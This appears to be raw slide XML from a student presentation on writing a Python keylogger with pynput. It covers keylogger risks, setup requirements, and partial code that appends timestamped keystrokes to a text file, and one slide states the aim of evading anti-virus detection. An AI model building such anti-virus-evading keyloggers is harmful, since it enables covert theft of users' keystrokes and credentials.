              <a:t>	Once a cyber criminal has got hold of confidential user data, s/he can easily transfer money from the user’s account or access the user’s online gaming account. Unfortunately access to confidential data can sometimes have consequences which are far more serious than an individual’s loss of a few dollars. Keyloggers can be used as tools in both industrial and political espionage, accessing data which may include proprietary commercial information and classified government material which could compromise the security of commercial and state-owned organizations (for example, by stealing private encryption keys).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>	Keyloggers, phishing and social engineering are currently the main methods being used in cyber fraud. Users who are aware of security issues can easily protect themselves against phishing by ignoring phishing emails and by not entering any personal information on suspicious websites. It is more difficult, however, for users to combat keyloggers; the only possible method is to use an appropriate security solution, as it’s usually impossible for a user to tell that a keylogger has been installed on his/ her machine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389372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398" y="699"/>
            <a:ext cx="9144000" cy="10668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nchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hardware/ Software requirement</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="FFFFFF"/>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1370856"/>
            <a:ext cx="8382000" cy="4801314"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hardware-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computer ( with internet connection ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Python IDE (PyCharm or Visual Studio Code).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Python dependencies are have to installed (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) when running with IDE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this program software we are using python platform because it is powerful ,easy to use with libraries available for more variation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 	But here we want to make more and more of unique cause normal keyloggers are easily detectable and predictable by anti-virus programs and malware detection programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>since a keylogger doesn’t have to be software – it can also be a device. Keylogging devices are much rarer than keylogging software, but it is important to keep their existence in mind when thinking about information security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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E1EEF-AE18-4350-83FA-6FD6F41559EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="304800"/>
            <a:ext cx="8534400" cy="6032421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Keylogging Program- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" u="sng" dirty="0">
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pynput.keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> import Key, Listener   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from datetime import datetime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>count = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>with open("keylogger.txt", "a") as f:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TimeStamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"+(str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datetime.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()))[:-7]+":\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14AC1E65-5DF0-4099-A729-DCA0FCAB6DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303362" y="685800"/>
            <a:ext cx="3815135" cy="1107996"/>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600" dirty="0" err="1">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pynput</a:t>
            </a:r>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 records the keyboard strokes (as well as with the help of this you can apply the strokes)   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4875A2DF-CEF7-4542-BE0D-01E50E265D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974568" y="1520122"/>
            <a:ext cx="4343400" cy="1070678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>//this line includes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>imprt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       from keyboard import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key,listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311F0E33-4435-4704-A61B-FDA2F1501D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2590800"/>
            <a:ext cx="41148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//importing date &amp;time from datetime module</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB5CD8A-FD2D-434B-84C3-8AE153999C2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4556182" y="3564261"/>
            <a:ext cx="4283015" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="18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//we using a txt file to save the records                                        where ‘a’ represents append method where the recorded text appear next to the previous    records , as a counter measure f.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
